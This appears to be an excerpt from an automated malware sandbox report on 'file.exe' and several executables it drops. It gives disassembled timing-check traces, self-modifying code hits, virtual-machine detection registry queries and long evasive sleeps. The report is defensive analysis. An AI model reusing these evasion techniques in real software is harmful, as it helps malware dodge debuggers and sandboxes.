Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501039F second address: 50103E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE70D000D8h 0x00000009 sub eax, 0F5871E8h 0x0000000f jmp 00007FDE70D000CBh 0x00000014 popfd 0x00000015 mov ax, 35DFh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [75AB4538h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push ebx 0x00000025 pop eax 0x00000026 movsx edi, cx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50103E2 second address: 50103E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50103E8 second address: 501040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501040E second address: 5010414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010414 second address: 50104ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE70D000D8h 0x00000009 adc esi, 4E4A3908h 0x0000000f jmp 00007FDE70D000CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FDE70D000D8h 0x0000001b or esi, 3B76DB68h 0x00000021 jmp 00007FDE70D000CBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xor eax, ebp 0x0000002c jmp 00007FDE70D000CFh 0x00000031 nop 0x00000032 jmp 00007FDE70D000D6h 0x00000037 push eax 0x00000038 jmp 00007FDE70D000CBh 0x0000003d nop 0x0000003e jmp 00007FDE70D000D6h 0x00000043 lea eax, dword ptr [ebp-10h] 0x00000046 jmp 00007FDE70D000D0h 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FDE70D000D7h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50104ED second address: 50104F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50104F3 second address: 50104F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50104F7 second address: 5010556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b pushad 0x0000000c mov bl, C9h 0x0000000e pushfd 0x0000000f jmp 00007FDE71263CF6h 0x00000014 add cx, 5748h 0x00000019 jmp 00007FDE71263CEBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000018h] 0x00000026 jmp 00007FDE71263CF6h 0x0000002b mov ecx, dword ptr [eax+00000FDCh] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010556 second address: 501055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501055C second address: 501059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b jmp 00007FDE71263CF0h 0x00000010 jns 00007FDE71263D1Bh 0x00000016 pushad 0x00000017 mov eax, 1DCD0F4Dh 0x0000001c call 00007FDE71263CEAh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501059E second address: 50105AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 add eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50105AD second address: 50105B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50001C3 second address: 500023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 mov cl, F7h 0x00000013 movsx edi, ax 0x00000016 popad 0x00000017 popad 0x00000018 sub esp, 2Ch 0x0000001b pushad 0x0000001c mov dl, ah 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FDE70D000D1h 0x00000025 sub ecx, 0B15FDD6h 0x0000002b jmp 00007FDE70D000D1h 0x00000030 popfd 0x00000031 mov si, 2547h 0x00000035 popad 0x00000036 popad 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FDE70D000D4h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500023F second address: 500024E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500024E second address: 5000274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDE70D000D9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000274 second address: 500027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500027A second address: 50002BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDE70D000CAh 0x00000009 and cx, E7E8h 0x0000000e jmp 00007FDE70D000CBh 0x00000013 popfd 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007FDE70D000D2h 0x00000020 xchg eax, edi 0x00000021 pushad 0x00000022 movsx edx, ax 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002BF second address: 50002C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002C3 second address: 50002D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50002D3 second address: 50002E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000375 second address: 50003A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDE70D000CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50003A3 second address: 50003B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50003B3 second address: 500041B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FDE70D00272h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDE70D000CDh 0x00000015 adc ch, 00000056h 0x00000018 jmp 00007FDE70D000D1h 0x0000001d popfd 0x0000001e mov dh, ch 0x00000020 popad 0x00000021 lea ecx, dword ptr [ebp-14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movzx esi, dx 0x0000002a pushfd 0x0000002b jmp 00007FDE70D000D1h 0x00000030 xor si, 1266h 0x00000035 jmp 00007FDE70D000D1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500041B second address: 5000439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000439 second address: 500043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500043D second address: 5000443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50004FF second address: 5000505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000505 second address: 500052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FDE71263D40h 0x0000000e pushad 0x0000000f movzx eax, dx 0x00000012 pushad 0x00000013 movsx edx, si 0x00000016 push esi 0x00000017 pop edi 0x00000018 popad 0x00000019 popad 0x0000001a cmp dword ptr [ebp-14h], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ecx, edx 0x00000022 mov cx, bx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500052B second address: 5000589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE70D000D4h 0x00000008 pop esi 0x00000009 jmp 00007FDE70D000CBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007FDEE175E010h 0x00000017 jmp 00007FDE70D000D6h 0x0000001c mov ebx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FDE70D000D7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000589 second address: 50005E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDE71263CEBh 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-2Ch] 0x0000000f pushad 0x00000010 mov dx, 49C8h 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FDE71263CF6h 0x00000020 xor ch, 00000028h 0x00000023 jmp 00007FDE71263CEBh 0x00000028 popfd 0x00000029 movzx ecx, bx 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FDE71263CECh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50005E4 second address: 50005F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50005F3 second address: 5000641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FDE71263CEEh 0x0000000f nop 0x00000010 jmp 00007FDE71263CF0h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDE71263CEEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000641 second address: 5000687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FDE70D000CFh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FDE70D000D2h 0x00000019 jmp 00007FDE70D000D5h 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000687 second address: 50006CC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDE71263CF0h 0x00000008 xor al, 00000068h 0x0000000b jmp 00007FDE71263CEBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx eax, dx 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 mov bx, si 0x0000001c mov ebx, eax 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FDE71263CF0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50006CC second address: 50006D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50006D0 second address: 50006D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50006F7 second address: 50006FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50006FC second address: 5000723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 mov ax, 05EDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 call 00007FDE71263CF1h 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000723 second address: 500001B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FDE70D000D0h 0x00000010 je 00007FDEE175DFD4h 0x00000016 xor eax, eax 0x00000018 jmp 00007FDE70CD97FAh 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 mov edi, eax 0x00000027 cmp edi, 00000000h 0x0000002a setne al 0x0000002d xor ebx, ebx 0x0000002f test al, 01h 0x00000031 jne 00007FDE70D000C7h 0x00000033 jmp 00007FDE70D001B9h 0x00000038 call 00007FDE75097840h 0x0000003d mov edi, edi 0x0000003f jmp 00007FDE70D000D2h 0x00000044 xchg eax, ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500001B second address: 500001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500001F second address: 5000023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000023 second address: 5000029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000029 second address: 5000038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE70D000CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000038 second address: 5000068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 36E70E92h 0x00000012 mov dh, 81h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000068 second address: 500006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500006C second address: 5000072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000072 second address: 5000094 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000094 second address: 5000098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000098 second address: 500009E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 500009E second address: 50000AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50000AD second address: 50000C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDE70D000D1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50000C9 second address: 50000CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50000CF second address: 50000F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50000F1 second address: 50000F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E3E032 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E3C744 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C91372 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E46CD8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: ECE90C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Special instruction interceptor: First address: 5FEB96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Special instruction interceptor: First address: 79C6C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Special instruction interceptor: First address: 828C0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Special instruction interceptor: First address: 6D1A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Special instruction interceptor: First address: 6D1B3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Special instruction interceptor: First address: 91CEDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 62EB96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 7CC6C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Special instruction interceptor: First address: 41DC59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Special instruction interceptor: First address: 5C8EA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Special instruction interceptor: First address: 650478 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 858C0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Special instruction interceptor: First address: 420DAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 61E032 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 61C744 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 471372 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 626CD8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Special instruction interceptor: First address: 6AE90C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Special instruction interceptor: First address: 2B1A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Special instruction interceptor: First address: 2B1B3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Special instruction interceptor: First address: 4FCEDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Special instruction interceptor: First address: FEEB96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Special instruction interceptor: First address: 118C6C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Special instruction interceptor: First address: 1218C0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Special instruction interceptor: First address: 4F1A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Special instruction interceptor: First address: 4F1B3F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Special instruction interceptor: First address: 73CEDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Special instruction interceptor: First address: B0DC59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Special instruction interceptor: First address: CB8EA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Special instruction interceptor: First address: D40478 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Special instruction interceptor: First address: B10DAB instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Memory allocated: 4BF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Memory allocated: 4D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Memory allocated: 6D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Memory allocated: 5070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Memory allocated: 54E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Memory allocated: 5330000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Code function: 3_2_04D50B3F rdtsc 3_2_04D50B3F
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1297 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1064 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1398 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1017 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1425 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Window / User API: threadDelayed 987
May sleep (evasive loops) to hinder dynamic analysis
